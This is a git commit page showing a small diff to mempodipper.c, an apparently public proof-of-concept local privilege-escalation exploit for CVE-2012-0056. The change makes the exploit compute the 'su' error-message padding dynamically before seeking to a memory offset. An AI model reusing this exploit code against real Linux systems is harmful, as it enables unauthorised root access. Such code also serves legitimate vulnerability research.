diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 22:02:11 +0100 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 22:02:11 +0100 |
| commit | 34d603029eb96fde8bc39a6f10ae84115e11008f (patch) | |
| tree | bd3498411cce9148f6b89ddc887f78d959075326 | |
| parent | Remove unused code. (diff) | |
| download | CVE-2012-0056-34d603029eb96fde8bc39a6f10ae84115e11008f.tar.xz CVE-2012-0056-34d603029eb96fde8bc39a6f10ae84115e11008f.zip | |
Calculate length of su dynamically.
| -rw-r--r-- | mempodipper.c | 8 |
1 files changed, 7 insertions, 1 deletions
diff --git a/mempodipper.c b/mempodipper.c index 2a80857..64919fa 100644 --- a/mempodipper.c +++ b/mempodipper.c @@ -189,7 +189,13 @@ int main(int argc, char **argv) } printf("[+] Resolved exit@plt to 0x%lx.\n", address); } - unsigned long su_padding = strlen("Unknown id: "); + printf("[+] Calculating su padding.\n"); + FILE *command = popen("su this-user-does-not-exist 2>&1", "r"); + char result[256]; + result[0] = 0; + fgets(result, 256, command); + pclose(command); + unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char); unsigned long offset = address - su_padding; printf("[+] Seeking to offset 0x%lx.\n", offset); lseek64(fd, offset, SEEK_SET); |